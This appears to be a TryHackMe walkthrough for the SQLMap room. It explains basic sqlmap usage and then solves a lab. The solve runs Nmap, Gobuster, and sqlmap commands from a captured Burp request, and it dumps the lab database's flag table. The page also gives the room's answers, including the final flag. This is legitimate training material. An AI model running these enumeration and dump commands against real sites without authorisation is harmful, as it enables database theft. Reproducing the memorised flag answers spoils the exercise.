SQLMap — TryHackMe Walkthrough
3 min readNov 21, 2023
What is sqlmap?
- Sqlmap is an open source penetration testing tool
- it automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
- it contains a broad range of switches from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
There can be two types of request based on methods : GET & POST
1. Simple HTTP GET Based Test
sqlmap -u https://testsite.com/page.php?id=7 --dbs
Here we have used two flags: -u to state the vulnerable URL and — dbs to enumerate the database.
2. Simple HTTP POST Based Test
sqlmap -r req.txt -p blood_group --dbs
sqlmap -r <request_file> -p <vulnerable_parameter> --dbs
Note : here req.txt is the file from the proxy server which we save after intercepting the request. in this case it has been done on the Burpsuite application.
SQLMap Challenge
- i Started by running the default Nmap scan
- here port 80 is open which is a default http webpage
- in the next step I ran the Gobuster tool to find if there are any directory listed. i found the /blood directory. i increased the thread (-t80) for faster searching.
Question 1 : What is the name of the interesting directory ?
Answer : blood
- then i go the webpage -> http://machine_ip/blood
- and give some dummy input to intercept the request into the burp suite and save the request to a file named request.txt for further use in sqlmap.
- then i issued the following command to find current-user :
sqlmap -r request.txt --current-user
Question 2 : Who is the current db user?
Answer : root
- then i look for the databases usingthe following command :
sqlmap -r request.txt -dbs
- next i select the blood database and try to find it’s table using the following command :
sqlmap -r request.txt -D blood --tables
- now i can check each tables. i select the second table named flag as of the interests and check for available columns in it with the following command :
sqlmap -r request.txt -D blood -T flag --columns
- and dump all the information within this particular database table named “flag” using following command :
sqlmap -r request.txt -D blood -T flag --dump
Question 3 : What is the final flag?
Ans : thm{sqlm@p_is_L0ve}